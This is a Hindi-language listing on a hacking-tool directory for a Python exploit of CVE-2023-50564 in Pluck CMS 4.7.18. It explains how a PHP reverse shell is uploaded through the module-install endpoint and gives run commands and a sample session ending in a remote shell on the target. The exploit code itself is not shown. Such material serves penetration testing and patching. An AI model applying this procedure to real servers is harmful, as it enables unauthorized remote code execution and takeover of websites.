Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-50564 — यह स्क्रिप्ट Pluck CMS v4.7.18 में फ़ाइल अपलोड सुविधा का शोषण करके एक दुर्भावनापूर्ण PHP फ़ाइल अपलोड करती है, जिससे रिवर्स शेल के माध्यम से दूरस्थ पहुँच सक्षम होती है। अपलोड होने के बाद, यह बैकडोर हमलावर को वेब सर्वर अनुमतियों के साथ सर्वर पहुँच प्रदान करता है, जिससे सिस्टम या नेटवर्क के भीतर आगे की कार्रवाई संभव होती है। | Kitploit
उपकरण/GitHubGitHub/mrterrestrial/cve-2023-50564
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubmrterrestrial/cve-2023-50564

CVE-2023-50564

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

यह स्क्रिप्ट Pluck CMS v4.7.18 में फ़ाइल अपलोड सुविधा का शोषण करके एक दुर्भावनापूर्ण PHP फ़ाइल अपलोड करती है, जिससे रिवर्स शेल के माध्यम से दूरस्थ पहुँच सक्षम होती है। अपलोड होने के बाद, यह बैकडोर हमलावर को वेब सर्वर अनुमतियों के साथ सर्वर पहुँच प्रदान करता है, जिससे सिस्टम या नेटवर्क के भीतर आगे की कार्रवाई संभव होती है।

11 साल पहलेअभी तक समीक्षित नहीं
साझा करें

CVE-2023-50564 - Pluck CMS v4.7.18 एक्सप्लॉइट

अवलोकन

यह स्क्रिप्ट Pluck CMS v4.7.18 (CVE-2023-50564) में प्रमाणित आर्बिट्रेरी फ़ाइल अपलोड भेद्यता का शोषण करती है। इस भेद्यता का लाभ उठाकर, एक प्रमाणित हमलावर एक दुर्भावनापूर्ण PHP फ़ाइल अपलोड कर सकता है, जिससे आर्बिट्रेरी कोड का निष्पादन संभव हो जाता है (इस मामले में, एक रिवर्स शेल)।

एक्सप्लॉइट विवरण

  • CVE ID: CVE-2023-50564
  • प्रभावित संस्करण: Pluck CMS v4.7.18
  • प्रकार: प्रमाणित आर्बिट्रेरी फ़ाइल अपलोड
  • प्रभाव: रिमोट कोड निष्पादन (RCE)

यह भेद्यता /admin.php?action=installmodule एंडपॉइंट में मौजूद है, जो एक प्रमाणित उपयोगकर्ता को आर्बिट्रेरी फ़ाइलों वाली ZIP फ़ाइल अपलोड करने की अनुमति देता है। एक दुर्भावनापूर्ण PHP फ़ाइल अपलोड करके, यह एक्सप्लॉइट हमलावर के पास वापस एक रिवर्स शेल स्थापित करता है।

आवश्यकताएँ

  • Python 3.x
  • requests मॉड्यूल: pip install requests
  • requests-toolbelt मॉड्यूल: pip install requests-toolbelt

इस स्क्रिप्ट को Pluck CMS इंस्टेंस के लिए एक मान्य लॉगिन की भी आवश्यकता होती है, जिसमें लक्ष्य का URL और पासवर्ड शामिल है।

एक्सप्लॉइट विशेषताएँ

  • रिवर्स शेल: एक्सप्लॉइट लक्ष्य पर एक PHP रिवर्स शेल अपलोड करता है और हमलावर की मशीन से वापस कनेक्ट होता है।
  • इंटरैक्टिव कमांड निष्पादन: रिवर्स शेल स्थापित होने के बाद, लक्ष्य पर कमांड इंटरैक्टिव रूप से निष्पादित किए जा सकते हैं।
  • पासवर्ड प्रॉम्प्ट का पता लगाना: एक्सप्लॉइट पासवर्ड प्रॉम्प्ट (जैसे, su, sudo -l) का पता लगाता है और उपयोगकर्ता को मैन्युअल रूप से इनपुट प्रदान करने की अनुमति देता है।

उपयोग

एक्सप्लॉइट चलाने के चरण

  1. रिपॉजिटरी क्लोन करें:
    root@kitploit:~
    git clone https://github.com/yourusername/Pluck-CMS-Exploit.git
    cd Pluck-CMS-Exploit
    
  2. आवश्यक Python पैकेज स्थापित करें: सुनिश्चित करें कि आवश्यक पैकेज स्थापित हैं:
    root@kitploit:~
    pip install requests requests-toolbelt
    
  3. एक्सप्लॉइट चलाएँ: स्क्रिप्ट को चार इनपुट की आवश्यकता होती है: लक्ष्य URL, CMS पासवर्ड, आपका IP पता (रिवर्स शेल के लिए), और वह पोर्ट जिस पर आप सुनना चाहते हैं।

Python का उपयोग करके एक्सप्लॉइट चलाएँ:

root@kitploit:~
 python3 exploit.py
  1. प्रॉम्प्ट किए जाने पर इनपुट प्रदान करें:
  • लक्ष्य URL दर्ज करें (जैसे, example.com)।
  • CMS पर प्रमाणीकरण के लिए पासवर्ड दर्ज करें।
  • रिवर्स शेल कनेक्शन के लिए अपना IP पता दर्ज करें।
  • रिवर्स शेल सुनने के लिए पोर्ट दर्ज करें।
  1. इंटरैक्टिव शेल: रिवर्स शेल स्थापित होने के बाद, आपको लक्ष्य सिस्टम के साथ इंटरैक्ट करने के लिए एक Shell> प्रॉम्प्ट प्रस्तुत किया जाएगा।

उदाहरण:

root@kitploit:~
 $ python3 exploit.py
 Enter the target URL (e.g., example.com): pluckcms.vulnerable.com
 Enter the password for target authentication: password123
 Enter your IP (for reverse shell): 10.10.14.5
 Enter the port to listen on (for reverse shell): 4444
 [*] Authenticating to the target...
 [+] Authentication successful.
 [*] Generating reverse shell PHP file...
 [+] Reverse shell PHP file created successfully as 'shell.php'.
 [*] Creating ZIP payload...
 [+] ZIP file created as 'payload.zip'.
 [*] Starting reverse shell listener on 10.10.14.5:4444 ...
 [*] Uploading payload to the target...
 [+] Payload uploaded successfully.
 [*] Triggering reverse shell at: http://pluckcms.vulnerable.com/data/modules/payload/shell.php
 [+] Connection received from ('10.10.10.1', 55678)
 Shell> whoami
 www-data

एक्सप्लॉइट विश्लेषण

  • प्रमाणीकरण: स्क्रिप्ट प्रदान किए गए क्रेडेंशियल्स का उपयोग करके CMS में लॉग इन करती है।
  • फ़ाइल अपलोड: यह एक PHP रिवर्स शेल युक्त ZIP संग्रह बनाती है और इसे भेद्य एंडपॉइंट (/admin.php?action=installmodule) पर अपलोड करती है।
  • रिवर्स शेल: स्क्रिप्ट अपलोड की गई PHP फ़ाइल को ट्रिगर करती है, जिससे हमलावर की मशीन पर वापस एक रिवर्स शेल कनेक्शन स्थापित होता है।

CVE विवरण

  • CVE ID: CVE-2023-50564
  • भेद्य एंडपॉइंट: /admin.php?action=installmodule
  • भेद्य संस्करण: Pluck CMS v4.7.18
  • प्रकार: प्रमाणित आर्बिट्रेरी फ़ाइल अपलोड

अस्वीकरण

यह स्क्रिप्ट शैक्षिक उद्देश्यों और नैतिक हैकिंग के लिए है। इसका उपयोग केवल उन परिवेशों में किया जाना चाहिए जहाँ आपके पास परीक्षण करने की स्पष्ट अनुमति हो। लेखक इस उपकरण के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है।

लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए MIT License देखें।

योगदान

बेझिझक रिपॉजिटरी को फोर्क करें और पुल रिक्वेस्ट सबमिट करें। किसी भी समस्या या फीचर अनुरोध के लिए, कृपया GitHub पर एक issue खोलें।

टूल डाउनलोड करें